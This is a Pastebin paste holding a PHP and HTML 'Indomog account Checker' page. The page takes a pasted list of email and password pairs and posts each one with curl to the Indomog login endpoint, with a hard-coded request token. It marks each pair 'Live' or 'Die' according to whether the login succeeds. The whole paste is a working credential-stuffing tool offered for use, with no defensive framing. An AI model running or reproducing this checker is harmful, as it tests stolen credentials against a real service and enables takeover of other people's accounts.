Advertisement
Guest User

indom

a guest
Feb 21st, 2016
177
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.59 KB | None | 0 0
  1. <html>
  2. <head>
  3. <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
  4.  
  5. <!-- Bootstrap Start -->
  6. <link rel="stylesheet" href="http://themes.suggelab.com/dynamic/css/bootstrap.css">
  7. <link rel="stylesheet" href="http://themes.suggelab.com/dynamic/css/main.css">
  8. <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
  9. <script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js"></script>
  10.  
  11. <title>Indomog Checker</title>
  12. <style>
  13. body {
  14. padding-top: 60px;
  15. }
  16. </style>
  17. </head>
  18. <body>
  19. <div class="container">
  20. <div class="panel panel-primary panelMove toggle panelRefresh panelClose">
  21. <!-- Start .panel -->
  22. <div class="panel-heading">
  23. <h4 class="panel-title">Indomog account Checker</h4>
  24. </div>
  25. <div class="panel-body">
  26. <form action="" method="POST">
  27. <textarea style="background:rgba(0,225,0,00);" name="mailpass" id="mailpass" style="width: 441px; height: 187px;" class="form-control" rows="7" placeholder="your@email.com|passW0rd"></textarea><br />
  28. <input type="text" style="width: 37px; height: 25px;" class="form-control" rows="7" name="delim" value="|">
  29. <input type="submit" class="btn btn-success" value="Submit" name="submit"><br>
  30. <?php
  31. if(isset($_POST['submit'])){
  32. $delim = $_POST['delim'];
  33. function search($line, $delim)
  34. {
  35. $line = str_replace(" ", "", $line);
  36. $line = explode($delim, $line);
  37. $i = 0;
  38. while ($i < count($line)) {
  39. if (strpos($line[$i], '@') && strpos($line[$i], '.')) {
  40. $mail = $line[$i];
  41. $pass = $line[$i + 1];
  42. $i = 10000;
  43. if ($pass == "") {
  44. $pass = $line[$i - 1];
  45. }
  46. }
  47. $i++;
  48. }
  49. $line = $mail . "|" . $pass;
  50. $line = explode('|', $line);
  51. return $line;
  52. }
  53. $data = $_POST['mailpass'];
  54. $extract = explode("\r\n", $data);
  55. $i = 0;
  56. foreach ($extract AS $k => $line) {
  57. $i++;
  58. if (strpos($line, '=>') !== false) {
  59. $line = str_replace('=>', '|', $line);
  60. }
  61. if (strpos($line, ']') !== false) {
  62. $line = str_replace('=>', '|', $line);
  63. }
  64. if (strpos($line, '[') !== false) {
  65. $line = str_replace('=>', '|', $line);
  66. }
  67.  
  68. $info = search(trim($line), $delim);
  69. $email = trim($info[0]);
  70. $pass = $info[1];
  71.  
  72. $dir = dirname(__FILE__);
  73. $config = $dir . '/_cook/' .rand(1,999999999999999). '.txt';
  74. if (!file_exists($config)) {
  75. $fp = @fopen($config, 'w');
  76. @fclose($fp);
  77. }
  78.  
  79.  
  80. $ch = curl_init('http://www.indomog.com/indomog2/new_core/index.php/login/');
  81. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  82. curl_setopt($ch,CURLOPT_POST,1);
  83. curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE);
  84. curl_setopt($ch,CURLOPT_POST,TRUE);
  85. curl_setopt($ch,CURLOPT_FOLLOWLOCATION,TRUE);
  86. curl_setopt($ch,CURLOPT_COOKIEFILE,$config);
  87. curl_setopt($ch,CURLOPT_COOKIEJAR, $config);
  88. curl_setopt($ch,CURLOPT_POSTFIELDS,"username=$email&password=$pass&request_token=0c674b5005c0bb51e5e3f902659d535c359889a1");
  89. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  90. $result = curl_exec($ch);
  91. if(preg_match('/invalid/i',$result)){
  92. echo "<font color=red><b>Die</b></font> :".$email."|".$pass." ./checked on inurl_id<br/>";
  93. }Else{
  94. echo "<font color=green><b>Live</b></font> :".$email."|".$pass." ./checked on inurl_id<br/>"; }
  95.  
  96. }
  97. }
  98. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement